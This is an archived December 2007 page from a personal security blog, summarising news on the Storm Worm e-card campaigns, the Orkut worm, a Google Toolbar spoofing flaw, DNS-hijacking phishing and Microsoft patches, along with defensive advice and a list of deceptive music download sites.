Recent Posts


Email Notifications

Personal Links


Security Protection - Harry Waldron (CS)

Security Best Practices, Breaking News, & Updates

December 2007 - Posts

Windows Server 2008 - Configuring Network Access Protection

Idea Tech Republic recently shared this article reflecting how to configure the NAP environment for the upcoming Windows 2008 Server operating system.  The examples shown are for the 3rd Beta build, but are reflective of what will most likely be included in the final version of NAP.  This is a major new security configuration toolkit should help security and network administrators when W/2008 is released in the future.  

Windows Server 2008 - Configuring Network Access Protection 

QUOTE: Unlike other Microsoft solutions, the MS-NAP implementation does not resemble other products like Exchange, SQL, or IIS, but exists more as a collection of roles, policies, and services. MS-NAP generally requires at least two servers to fully implement all of the roles outlined by Microsoft. MS-NAP has a few basic elements that enable the implementation to succeed as designed.

Below are details of some of the best server practices to ensure a MS-NAP implementation can start off correctly:

  • Software and network policies: While not a technology matter, it's important to first identify the functionality desired by the MS-NAP implementation, and then apply the technology to define the service pack levels, anti-virus criteria, IPSec policies, and other factors to permit access to a specified network. And then to define what happens in a non-compliant state: remediation network, denied access, or other way of handling non-compliant systems.
  • Active Directory domain: This part of the back-end infrastructure should be very organized so that users accessing it have clear access to specified resources. Don't fall into the over-permissions trap simply to make things work. MS-NAP functions in a mash of roles depending on your configuration, but it's required that it be at functionality level Windows Server 2003 or higher.
  • VPN access: If the VPN enforcement method is used, the VPN solution is critically important for an MS-NAP implementation. This external (Internet) connections is for internal VPN connections for higher level secure sites within your private network if used.
  • Network equipment: Ensure that your equipment supports 802.1X authentication, especially if using wireless clients or the 802.1X EC.
  • DHCP networking: The DHCP network in regard to the MS-NAP implementation is important, as there are scope options that designate a class for remediation should a system not be compliant with the MS-NAP policy.
SecTor - Security Conference presentations available

Star Some excellent Powerpoint and other resources are still available from the SecTor (Security Conference in Toronto) held Nov 20-21 in Toronto.  In particular, I enjoyed Steve Riley's PPT presentation on Defending OSI Layer 8 (the human element):

Microsoft Office 2007 - Security Guide Available

Microsoft Office 2007 - Security Guide Available

Star QUOTE: The zip file includes the following elements:

* 2007 Microsoft Office Security Guide: This document describes the security features in the 2007 Office release and how they can help mitigate issues of confidentiality, integrity, and availability. The guide also contains prescriptive guidance for configuring your environment through Group Policy.
* 2007 Microsoft Office Threats and Countermeasures: This reference describes Group Policy settings that relate to security and privacy

* Security Settings for 2007 Office Applications

* The following informational materials are also provided:

-- 2007 Microsoft Office Security Guide Data Sheet
-- 2007 Microsoft Office Security Guide FAQ
-- 2007 Microsoft Office Security Guide Executive Overview

New and Improved Storm Worm botnet coming in 2008

Storm While Microsoft's MSRT facilities have cleaned hundreds of thousands of copies found on client PCs, the Storm Worm botnet continues to launch new attacks (and thankfully with fewer copies due to the diminished size now). 

Still, malware innovations continue for this highly advanced attack that mitigate spam and AV detection controls.  A high degree of security is built into the botnet (e.g., fast-flux servers and DDoS traps), which makes it difficult to locate the master servers and the malware authors themselves.   All new developments for the Storm Worm are important to follow during 2008.    

Time  New and Improved Storm Worm botnet coming in 2008

QUOTE: Obviously the Russian Business Network (RBN) is working overtime during the Christmas and New Year holiday, no doubt planning for many in the ISP security and anti-spam arena to be on skeleton staff.

The key objective for the Russian Business Network (RBN) is to rebuild the Storm Botnet which is shown in various reports over the last few months, from a few million enslaved PCs to more recently a few 100,000’s. One can only further guess as to what the RBN’s main goal is to use a rebuilt Storm Botnet for, e.g. earlier DDOS (Denial of Service attack) on Estonia.

Lightning There are some interesting elements which make this new attack innovative:

-- Although much of that detected is conventional spam, however there is also a large amount of spam which is getting through many anti-spam defenses due to the use of “fake” BlogSpot (Blogger) links

-- Although most have identified as the Zhelatin Storm email worm or variant, it is also as the more recent fake codec downloads, dependent upon where the unfortunate user has come from. This now shows a “polymorphic” format, i.e. the virus or exploit has the ability to alter its signature in an attempt to combat anti-virus tools.

-- The fast-flux technique used to avoid detection in this case is actually “double-flux” characterized by multiple nodes within the network registering and de-registering their addresses. It is also safe to say this newer Storm Network has now also has improved defense mechanisms, if examined too closely.

Lightning More information related to the most recent Christmas and New Year's e-card attacks can be found here:

Perl 5.10.0 - First new release in Five Years

  Perl is a robust programming language that was introduced during 1987. It has widespread usage in the open source environment, particularly for web and other processing scripts. While most Linux distributions automatically include Perl, a Windows version is also available for downloading. This is the first new major version release in five years

Perl 5.10.0 - First new release in Five Years,1895,2241465,00.asp

QUOTE:  Perl is a dynamic scripting language widely used in everything from Linux system utilities to Web servers to full-blown graphical enterprise applications. Just in time for Christmas, there's a new version of perl, the first in over five years. The first update since 2002 to the "practical extraction and report language," perl 5.10 adds both new language features and an improved perl interpreter, according to community site Perl Buzz.

Perl is a dynamic scripting language widely used in everything from Linux system utilities to Web servers to full-blown graphical enterprise applications. During its 20-year history, it gained massive popularity by assimilating the syntax from many predecessors, making it really easy to use for anyone already versed in sed, awk, grep, csh, C/C++, Lisp, and so on.

  Change Log - What's new in Perl 5.10.0

More information related to Perl

Download Perl Distributions

Article: Defending Windows Vista

Idea I thought both of these articles were on point and provide good feedback, (esp. the 10 items listed in article #1).  

Article #1 - What went wrong with Windows Vista

Article #2 - Defending Windows Vista

QUOTE: This is a post I never imagined writing. But with so many year-end reviewers panning Vista, somebody other than Microsoft must make the defense. Vista is so important an operating system that I'm writing not one, but two year-end reviews.

Vista hasn't done so well in other year-end reviews. Last week, my former JupiterResearch colleague Michael Gartenberg observed that "Vista's been really getting slapped around lately." Oh, is that an understatement.

As example, Gartenberg linked to a rather ridiculous CNET Crave ranking that put Vista on a list of "top ten terrible tech products. I referenced the same listing late last month. It's lame to put Vista on a list with stinkers like the late-1990's Apple puck mouse or Sinclair C5.

Vista isn't a bad operating system, it's just not remarkably better than Windows XP. Maybe if more bloggers and reviewers had kept those free laptops, they would now have enough experience using Vista to see its benefits.

CDTs Warning List of Deceptive Music Sites to Avoid

Music As I respect intellectual property rights of artists and musicians, I've always been careful to avoid peer-to-peer (P2P) based sites offering "free music".  These P2P sites often contain malware, that represents another danger for users in addition to potentially violating copyright laws.

The sites identified below promote themselves as major subscription sites, where users pay a fee for these services. While these companies differ from the clearly illegal P2P based sites, subscribers could still experience some of the following issues:

-- A subscription fee must be paid (and it may be difficult to be reimbursed properly after paying)

-- These sites are not authorized for legal downloads of all artists as documented by the CDT

-- These sites may not have all the mainstream or popular artists

-- Adware, spyware, or other malware agents may even be present on a few of these sites

Sunbelt Blog - List of deceptive music sites

QUOTE: The CDT has published a list of deceptive music sites. As you know, there are people out there who actually believe that by signing up with these services, the music is somehow legit. Of course, these are basically pirate sites.

CDT - Music Download Warning List

QUOTE:  Thinking of signing up and paying money to a music download service that looks legitimate and perhaps even claims to be “legal?” Check our list first.

Unfortunately, some sites may be happy to take your money, and may leave you with the impression that they are legal sources of a full range of music – including the top performers and music labels – but they are not licensed distributors of at least a substantial quantity of mainstream music. In particular, the sites on our list promote themselves in ways that suggest their music catalog is relatively comprehensive, when in fact they appear to have done nothing to license or otherwise ensure the legality of any downloads from the major music labels.

In short, if you are an Internet user in the United States and you pay money to one of these services with the intention of being a lawful online music user, you may get less than you bargained for.

CDT - Music Download Web Sites to Avoid
Note - URLs have been altered to avoid accidentally navigating to these sites

allcoolmusic (dot) com
allmusicdownloads (dot) com
e-mp3now (dot) com
easymusicdownload (dot) com
ezmp3s (dot) com
free-music-downloads (dot) cc
freeaccessmp3 (dot) com
freemusicnow (dot) cc
howdoiwin (dot) com
imp3download (dot) com
imusicaccess (dot) com
imusicsearch (dot) com
klitetk (dot) com
mimusicamp3 (dot) com
mp3-all-free (dot) com
mp3-download-lyrics (dot) com
mp3-freebie (dot) com
mp3-freedom (dot) com
mp3downloadhq (dot) com
mp3downloadnet (dot) com
mp3downloadsnow (dot) com
mp3favorites (dot) com
mp3musichq (dot) com
mp3rocket (dot) com
musicjustfree (dot) com
my-free-songs (dot) com
my-music-now (dot) com
myipodaccess (dot) com
mymusicinc (dot) com
netmusicaccess (dot) com
netmusicsite (dot) com
realmusicnow (dot) com
unlimiteddownloadcenter (dot) com


I personally enjoy almost all types of music. A great legitimate resource was found last year, while searching for MP3s to assist our daughter on her high school project. While many mainstream and popular artists will not be found on this site, I've personally built an excellent library of MP3s during the past year.


CNET's  site has about 75,000 songs on it. These are mostly from "starving artists" rather than the most popular ones. However, this is a safe, DRM-legal, and malware-free site. There's no need to register for anything, as you simply pick a musical category and start downloading. The overall concept is that these artists hope you'll find something in the samples you like, and maybe purchase some of their works.

Still, when it comes to some of my personal favorite categories (e.g., Celtic, Classic, Jazz, Gospel, Contemporary Instrumentals, etc.), the price is right -- if you have some time to download & review these. I've found some "gems" here that are great to load up in the MP3 player. These are all free, and some are streaming only links, and I skip these going for the MP3s (which are in the great quality 192 kbps formats).

Steps for finding artists by category:

1. Select on the left menu pane, the type of music desired (JAZZ in my example)

2. This takes you to the JAZZ main section (which you can drill down into sub-categories, or use the entire topical area)

3. Click on ALL Artists tab

4. Then you can download available MP3s for individual artists as desired.  Sometimes, only an on-line streaming link is offered rather than a sample MP3 and I skip these. 

5. To build the MP3 library, I usually keep track of what has been downloaded in a text file over time.  I delete those items that I won't listen to again.  I usually create an overall folder for the music type (e.g., Classical, Jazz, Gospel, etc).  and then create sub-folders for each artist.

6. Finally, for good backup, I create CDs of the MP3 library or copy the folder to USB Flash drive so they can be loaded on my other PCs.


Storm Worm - Christmas and New Years e-card dangers

Storm A new version of the Storm Worm is circulating and it invites folks to visit websites that contain malicious agents that can infect your PC.  Always avoid suspicious and unexpected email, and please do not follow any of these links.  The Storm Worm is one of the most advanced malware attacks circulating and may be difficult to detect or clean from your system.

Lightning New Storm Worm - New Years Theme

QUOTE: This version is a New Years-themed e-card directing victims to a malicious website with malware behind it. The message comes in with a number of subjects and body-text. The one line message bodies are also being used as the subject lines.

Below are examples of email subject lines seen so far:

A fresh new year
As the new year...
As you embrace another new year
Blasting new year
Happy 2008!
Happy New Year!
It's the new Year
Joyous new year
New Hope and New Beginnings
New Year Ecard
New Year Postcard
Opportunities for the new year
Wishes for the new year
Happy New Year to You!
Happy New Year to <email address>
Lots of greetings on the new year
New Year wishes for You

There is also a Christmas e-card version  that started circulating on Christmas Eve:

Lightning New Storm Worm - Christmas Theme

QUOTE: It turns out that the Storm gang was going to do a Christmas Malware run after all, they just decided to start it surprisingly late - on Christmas eve itself! This site contains a new version of the Storm Worm. The IP address of the site changes every second. Don't be naughty and go wondering to that domain. Please do not click on the "Download For Free Now" button as it will get you infected. Merry Christmas, y'all!

Google Toolbar - Custom Button Spoofing Vulnerability

A new proof-of-concept vulnerability has surfaced where malicious code can be triggered through a crafted link to the button's underlying XML file. While Google has a few additional safety checks, Google toolbar users should avoid adding new buttons until this vulnerability is fixed.

Google Toolbar - Custom Button Spoofing Vulnerability

QUOTE: The Google toolbar has found yet another use: as a possible malware vector. A researcher has released a proof-of-concept (PoC) code, which demonstrates how an attacker may install malicious software or conduct phishing attacks by prompting the user to install a new Google toolbar button.

Affected Google toolbar versions are as follows:

Google Toolbar 5 beta for Internet Explorer
Google Toolbar 4 for Internet Explorer
Google Toolbar 4 for Firefox (partially)

The code makes use of a specially crafted link that refers to the button’s XML file, which when clicked displays a dialog box summarizing the details of the button to be installed. This dialog box also displays a URL of where the button is to be downloaded. Through manipulation, however, a malicious author could make it appear that the said URL is non-malicious by adding special redirector strings. This further increases the user’s trust in the button to be installed. If the toolbar does get installed, the user must manually click on the button to execute it, which in turn may run an installation script (which a user must approve to install) or a fake log-in console (for phishing purposes).

However, Google classifies the PoC as non-critical, due to the multitude of steps involved before a user does get infected. Nevertheless, the search giant has confirmed that it is currently looking for a fix to remedy the bug.

Google actually encourages the creation of custom buttons for its toolbar, and outlines the ease of creating one in their Web site, complete with API documentation. This ease-of-creation feature, coupled with Google’s large fanbase, opens up plenty of possibilities for its users, malware authors included.  For the meantime, users of Google toolbar are advised to refrain from adding new buttons.

Google's Orkut Social Network - New worm infects 400,000 users

Thankfully, this new Java Script based worm attack was relatively harmless and did not compromise personal information.  It was most likely launched as a proof-of-concept test.   Google also quickly stopped these attacks.

Folks should always be cautious in social network environments, as MySpace and similar sites have been constantly attacked. Avoid accepting anything suspicious even if it's from one of your friends, as they may be among the infected.  AV software should be kept up to date as many vendors now offer detection.

Google's Orkut Social Network - New worm infects 400,000 users,140653-c,worms/article.html

QUOTE: Google's Orkut social networking site appeared to have been hit by a relatively harmless worm, but one that demonstrated the continuing vulnerability of Web applications. Some Orkut users received an e-mail telling them they had been sent a new scrapbook entry -- a type of Orkut message -- on their profile from another Orkut user. The description of the group reveals that the worm was designed to show Orkut could be dangerous to users even if they do not click on malicious links, Hinckley wrote. The worm apparently did not try to steal any personal data.

At one time the infected group was adding new members at a rate of 100 per minute, and had reached a few hundred thousand members, according to various postings, but the problem appears now to be fixed, Hinckley wrote. Orkut's scrapbook feature allows people post messages that contain HTML code, but it may lack a filter to strip out malicious JavaScript, Hinckley wrote.


McAfee: W32/KutWormor - Google Orkut Worm

QUOTE: The infected user will start to send scraps (messages on Orkut model) to his friends. The scrap will arrive by email to the friend with some portuguese messages like: "2008 vem ai... que ele comece mto bem para vc", which means "2008 is arriving, I hope that it starts quite will for you", or "Boas Festas de final de Ano!", which means "Have a nice new years party!".

Once the user received the email and checks the scrap, the message will contain a javascript, called virus.js which will execute and start the sending scraps process and add the infected user to the "Infectados pelo Virus Orkut" community. This is specially target for Brazilian users, the majority of the users from the Google social network, but other users may be affected by checking these scraps.

Method of Infection:
-- the user receives an email telling that they got a new scrap...
-- the user checks Orkut's scrapbook...
-- by just checking the scrap book they became infected since the message has a link to a remote malicious .js file (virus.js)

Additional Links

Orkut Blog - More information may be posted later

Mars - Closest encounter to earth until 2016 (not an email hoax this time)


Star Occasionally, I'll receive an email hoax as noted below.  However, this event is REAL, so please take time out and observe the brightest "star" in the skies:

POPULAR MARS Email Hoax - Planet Mars at closest distance to earth

I've been watching Mars for weeks and it's spectacular Smile .. Please take a brief break if you have clear skies to observe this if possible. Even if you miss tonight, it'll still be close by all month.

Mars - Closest encounter to earth until 2016

VIEWING TIPS (at least for northern hemisphere)
- About 2 hours after sunset, look in eastern skies for a very bright "star" rising from horizon
- Mars will continue moving higher in skies overnight
- Eventually it will become the brightest "star" in skies
- For C2C fans, look for UFO opportunities tonight Wink

QUOTE: CLOSE ENCOUNTER: Tonight, Dec. 18th, Mars makes its closest approach to Earth until the year 2016. At a distance of only 55 million miles, Mars outshines every star in the night sky (it is slightly brighter than Sirius) and draws attention to itself with its distinctive red color.

Spammed Trojan email - Avoid Happy New Year Exe attachment

Gift  'Tis the time of year to avoid all e-cards and attachments that might appear to be seasonal in nature. Some of these attacks could require hours of repair work (if you're lucky enough to escape major losses of information). Even worse, some malware will "phone home" and when you enter sensitive information like credit card or bank account #'s you could actually loose real money from these accounts.
 Spammed Trojan email - Avoid Happy New Year Exe attachment
 QUOTE: Some clown is spamming around an attachment called Happynewyear.exe ... When run, this malware drops a nice Christmas tree to your desktop and Systray. The malware itself (detected as Trojan-PSW:W32/Delf.BBE by our antivirus) steals passwords and other assorted information and sends them to a website.

IT Software Policies - Student Gets Detention for Using FireFox

Some folks have alleged this may be a hoax?  If this is a real story, it was only a minor 2 hour detention rather a major suspension for the student, for not following school policy. The student had repeated warnings to close down the application, even though the teacher may or may not know that Firefox is another browser alternative for the student to complete their work under.

The student may not have known how to save their work that was in process as a compounding factor.  Still, this incident provides an interesting point regarding IT security and software policies.  Folks must abide by the policies, rules, and disciplinary warnings related to software policies.

Personally, I like IE 7, Firefox, Opera, and Safari as browser tools.   The latest versions of each browser has good security and functionality.  Each of these tools have their advantages and disavantages.  For example, as most exploits in the wild are written for IE, it might be beneficial for schools or libraries to have Firefox as a complementary browser to reduce leading edge spyware or adware infections (albeit no browser is entirely immune or safe).  Still, if an organization does not want to support additional software, users should abide by the rules.  

Student Gets Detention for Using FireFox

Below is a more pronounced example of the dangers associated with allowing folks at school or work to "do their own thing"

One Example related to dangers of allowing unrestricted software usage

QUOTE: Not browser related but one of my friends booted one of the school computer from his USB which had Linux on it, it let him access all the files on the network of the system, so he could see the name and address of every pupil etc.. This is probably just the bad security at my school, but i can see why schools might take something like this seriously  It was funny though

Apple Safari for Windows XP and Vista - v3.0.4b Security Release

Computer  Apple Computers began a beta program earlier this year to introduce Safari as a browser for the Windows environment.  From a functional standpoint, it has also been enhanced considerably as noted below in the change log. 

I recently upgraded to this latest version of Windows Safari for improved security. While IE 7 and Firefox 3.0b are used primarily, I've enjoyed testing this new browser, which also has good features.  Based on good reliability, performance, functions, and improved security, folks should upgrade to the latest version. 

Apple Safari for Windows XP and Vista - v3.0.4b release

Apple Safari for Windows XP and Vista - v3.0.4b download (15.6MB)



What's included?

New features

  • Allows windows to be resized from any side
  • Includes an additional font smoothing option ("standard")
  • Adds International text input methods
  • Adds advanced text options (contextual forms, international scripts)
  • Supports NTLM
  • Includes auto-detection of PAC files
  • Supports listing FTP directories
  • Links to proxy settings from Safari (Safari respects the proxy settings in the Windows Internet control panel)
  • Adds cookie management
  • Adds LiveConnect support
  • Includes tooltips
  • Adds spell checking and grammar checking
  • Allows printing of page numbers, titles, margins
  • Improves bookmark collection interface
  • Maintains original order of imported bookmarks
  • Adds an interface for editing AutoFill information
  • History searches now search the full text of visited websites
  • Adds a new preference to manually mark RSS articles as read
  • Includes support for tilt wheels

New keyboard shortcuts added

  • Alt-Enter in the Address field opens the same page in new background tab
  • Alt-Shift-Enter in the Address field opens the same page in new foreground tab
  • Ctrl-Enter in the Search field opens search results in new window
  • Alt-Enter in the Search field opens search results in new background tab
  • Alt-Shift-Enter in the Search field opens search results in new foreground tab
  • Ctrl-Enter for (www/com) completion in the URL bar
  • F6 to switch between the content area and URL bar
  • Ctrl-Tab and Ctrl-Shift-Tab to navigate between tabs
  • Backspace and Shift-Backspace to go back/forward between Web pages
  • Ctrl-F4 to close a tab
  • Ctrl-E to focus the search field
  • Windows-M to minimize
  • Ctrl-mouse wheel to zoom
  • Shift-mouse wheel to scroll horizontally


  • Improves application stability


  • Increases standards and site compatibility


  • Improves JavaScript performance
  • Improves application launch performance


  • For information about the security content of this update, visit this website
  • Allows you to clicking the lock icon to see detailed information about a site's certificate

Important: Safari Public Beta is preview software licensed for use on a trial basis for a limited time. Do not use Safari Public Beta in a commercial operating environment or with important data. You should back up all of your data before installing this software and regularly back up data while using the software. Your rights to use Safari Public Beta are subject to acceptance of the terms of the software license agreement that accompanies the software.

Symantec Blog - The 12 Days of Christmas Spam

Gift While humourous, this reflects many of the emails we are bombarded with on a daily basis 

Microsoft Security Updates for December 2007 - PATCH NOW

On Patch Tuesday, Microsoft issued their latest security updates affecting Windows, IE, and Office as follows: 

Star Critical:
Microsoft Security Bulletin MS07-064
Vulnerabilities in DirectX Could Allow Remote Code Execution (941568)
Affects:  DirectX 7.0, 8.1, 9.0c and 10.0

Microsoft Security Bulletin MS07-068
Vulnerability in Windows Media File Format Could Allow Remote Code Execution (941569 and 944275)
Affects: Windows Media Format Runtime 7.1, 9, 9.5 and 11

Microsoft Security Bulletin MS07-069
Cumulative Security Update for Internet Explorer (942615)
Affects: Internet Explorer 5.01, 6.0 & 7

Star Important:
Microsoft Security Bulletin MS07-063
Vulnerability in SMBv2 Could Allow Remote Code Execution (942624)
Affects: Windows Vista

Microsoft Security Bulletin MS07-065
Vulnerability in Message Queuing Could Allow Remote Code Execution (937894)
Affects: Windows 2000 Pro and Server, Windows XP

Microsoft Security Bulletin MS07-066
Vulnerability in Windows Kernel Could Allow Elevation of Privilege (943078)
Affects: Windows Vista

Microsoft Security Bulletin MS07-067
Vulnerability in Macrovision Driver Could Allow Local Elevation of Privilege (944653)
Affects: Windows XP and Windows 2003 Server

Bulletin Summary:

Computer Based on the ISC analysis, the Internet Explorer updates have active exploits circulating and are rated as


So far, so good in my own experiences (about a 22MB download with reboot) for XP SP2, IE 7 and O/2003 ... One more resource is noted below

Malicious DNS servers could enhance Phishing attacks

0  DNS translations change web addresses like to a numerical IP address.  The translated numerical IP address is what is actually used in the web site lookup process.  This potential attack is alarming as vulnerable PCs could be hijacked to always point to a malicious DNS server for all Internet access

As the articles reflect these DNS hijacking exploits could serve up the correct web addresses most of the time and redirect users only once in a while. The alarming part of this is that users may feel they are doing valid online transactions, but are in essence giving the bad guys their bank account, credit card, or other identification.   

To reduce these risks, users should stay up-to-date on all security patches and AV protection. They also be careful with email attachments and web links.

Articles: DNS Attack Could Signal Phishing 2.0,140465-c,onlinesafety/article.html

QUOTE: Researchers at Google and the Georgia Institute of Technology are studying a virtually undetectable form of attack that quietly controls where victims go on the Internet. The study, set to be published in February, takes a close look at "open recursive" DNS servers, which are used to tell computers how to find each other on the Internet by translating domain names like into numerical Internet Protocol addresses. Criminals are using these servers in combination with new attack techniques to develop a new generation of phishing attacks.

The Georgia Tech and Google researchers estimate that as many as 0.4 percent, or 68,000, open-recursive DNS servers are behaving maliciously, returning false answers to DNS queries. They also estimate that another two percent of them provide questionable results. Collectively, these servers are beginning to form a "second secret authority" for DNS that is undermining the trustworthiness of the Internet, the researchers warned.

Here's how an attack would work. A victim would visit a Web site or open a malicious attachment that would exploit a bug in his computer's software. Attackers would then change just one file in the Windows registry settings, telling the PC to go to the criminal's server for all DNS information. If the initial exploit code was not stopped by antivirus software, the attack would give attackers virtually undetectable control over the computer.

Once they'd changed the Windows settings, the criminals could take victims to the correct Web sites most of the time, but then suddenly redirect them to phishing sites whenever they wanted -- during an online banking session, for example. Because the attack is happening at the DNS level, anti-phishing software would not flag the phoney sites.

"It's really the ultimate back door," said Chris Rouland, chief technology officer with IBM's Internet Security Systems division. "All the stuff we've deployed in the enterprise, it's not going to look for this."

Microsoft Access - Malicious Exploit in-the-wild

protect.gif Users should avoid unexpected MDB files found in email or offered as downloads for websites. They should also stay up-to-date on security patches and AV protection. Hopefully, this will be patched as part of the January security updates 

Active Exploitation Using Malicious Microsoft Access Databases

QUOTE: Online criminals are exploiting a flaw in the Microsoft Office Access database to install unauthorized software on computers, the United States Computer Emergency Readiness Team (US-CERT) has warned. In its brief warning, US-CERT offered few details on the attack, saying simply that the organization is "aware of active exploitation" of the problem by criminals who have sent specially crafted Microsoft Access Database (.mdb) files to victims.

Exploit based on Microsoft Jet DataBase Engine MDB File Parsing Remote Buffer Overflow Vulnerability

Kim Kommando - offers 7 question quiz for e-commerce shopping

Idea Kim Kommando shares privacy and security tips each week on her national radio talk show. This quiz offers 7 questions related to e-commerce security -- thankfully I was 7 for 7

QUOTE: With Christmas coming up, many of us are turning to the Internet. The thousands of online retailers make shopping from home a pleasure. The trend is a pleasure for Web crooks, too. They'll do whatever it takes to lighten your wallet.

protect.gif The bad guys can be thwarted if you're careful. With that in mind, you'll find my quiz interesting. Just how much do you really know about safe shopping?

Kim Kommando - How secure are you when you go shopping?

Steve Riley - Excellent Powerpoint presentation on Social Engineering Risks

Idea The Powerpoint slide show is one of the most comprehensive presentations I've seen on the topic of Social Engineering. The human element is added as a level 8 to the classical OSI security model. The Powerpoint even includes some humor to keep things interesting throughout. There's also a podcast which is a 7 minute Q&A with Steve Riley on social engineering dangers.

Podcast and PPT links can be found here

Steve Riley - Defending OSI level 8
Powerpoint 7.2MB - 96 slides

More Posts Next page »